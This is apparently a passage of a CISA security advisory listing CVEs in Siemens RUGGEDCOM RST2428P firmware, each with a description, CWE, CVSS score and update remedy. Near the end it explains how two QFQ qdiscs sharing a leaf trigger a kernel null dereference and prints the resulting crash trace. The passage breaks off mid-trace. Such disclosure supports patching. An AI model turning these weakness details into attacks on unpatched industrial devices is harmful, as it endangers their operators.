<div class="csaf-accordion-content">
<p>In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66382">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/407.html">CWE-407 Inefficient Algorithmic Complexity</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.9</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66412</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 21.0.2, 20.3.15, and 19.2.17, A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. It occurs because the compiler's internal security schema is incomplete, allowing attackers to bypass Angular's built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain javascript: URLs) as requiring strict URL security, enabling the injection of malicious scripts. This vulnerability is fixed in 21.0.2, 20.3.15, and 19.2.17.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66412">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-69720</a></h3>
<div class="csaf-accordion-content">
<p>The infocmp command-line tool in ncurses before 6.5-20251213 has a stack-based buffer overflow in analyze_string in progs/infocmp.c.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-69720">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71185</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation Make sure to drop the reference taken when looking up the crossbar platform device during am335x route allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71185">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71186</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: stm32: dmamux: fix device leak on route allocation Make sure to drop the reference taken when looking up the DMA mux platform device during route allocation. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71186">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71188</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: lpc18xx-dmamux: fix device leak on route allocation Make sure to drop the reference taken when looking up the DMA mux platform device during route allocation. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71188">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71189</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: dw: dmamux: fix OF node leak on route allocation failure Make sure to drop the reference taken to the DMA master OF node also on late route allocation failures.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71189">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71190</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: bcm-sba-raid: fix device leak on probe Make sure to drop the reference taken when looking up the mailbox device during probe on probe failures and on driver unbind.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71190">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71191</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: at_hdmac: fix device leak on of_dma_xlate() Make sure to drop the reference taken when looking up the DMA platform device during of_dma_xlate() when releasing channel resources. Note that commit 3832b78b3ec2 ("dmaengine: at_hdmac: add missing put_device() call in at_dma_xlate()") fixed the leak in a couple of error paths but the reference is still leaking on successful allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71191">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-1484</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-1484">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.2</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-1489</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-1489">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-3784</a></h3>
<div class="csaf-accordion-content">
<p>curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a server, even if the new request uses different credentials for the HTTP proxy. The proper behavior is to create or use a separate connection.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-3784">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/305.html">CWE-305 Authentication Bypass by Primary Weakness</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22610</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0, a cross-site scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular’s internal sanitization schema fails to recognize the href and xlink:href attributes of SVG elements as a Resource URL context. This issue has been patched in versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22610">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22976</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset `qfq_class-&gt;leaf_qdisc-&gt;q.qlen &gt; 0` does not imply that the class itself is active. Two qfq_class objects may point to the same leaf_qdisc. This happens when: 1. one QFQ qdisc is attached to the dev as the root qdisc, and 2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get() / qdisc_put()) and is pending to be destroyed, as in function tc_new_tfilter. When packets are enqueued through the root QFQ qdisc, the shared leaf_qdisc-&gt;q.qlen increases. At the same time, the second QFQ qdisc triggers qdisc_put and qdisc_destroy: the qdisc enters qfq_reset() with its own q-&gt;q.qlen == 0, but its class's leaf qdisc-&gt;q.qlen &gt; 0. Therefore, the qfq_reset would wrongly deactivate an inactive aggregate and trigger a null-deref in qfq_deactivate_agg: [ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 0.903571] #PF: supervisor write access in kernel mode [ 0.903860] #PF: error_code(0x0002) - not-present page [ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0 [ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI [ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE [ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 [ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2)) [ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0 Code starting with the faulting instruction =========================================== 0: 0f 84 4d 01 00 00 je 0x153 6: 48 89 70 18 mov %rsi,0x18(%rax) a: 8b 4b 10 mov 0x10(%rbx),%ecx d: 48 c7 c2 ff ff ff ff mov $0xffffffffffffffff,%rdx 14: 48 8b 78 08 mov 0x8(%rax),%rdi 18: 48 d3 e2 shl %cl,%rdx 1b: 48 21 f2 and %rsi,%rdx 1e: 48 2b 13 sub (%rbx),%rdx 21: 48 8b 30 mov (%rax),%rsi 24: 48 d3 ea shr %cl,%rdx 27: 8b 4b 18 mov 0x18(%rbx),%ecx ... [ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246 [ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000 [ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000 [ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000 [ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880 [ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000 [ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0 [ 0.910247] PKRU: 55555554 [ 0.910391] Call Trace: [ 0.910527] [ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485) [ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036) [ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076) [ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447) [ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958) [ 0.911663] ? __pfx_rtnetlink_rcv_msg 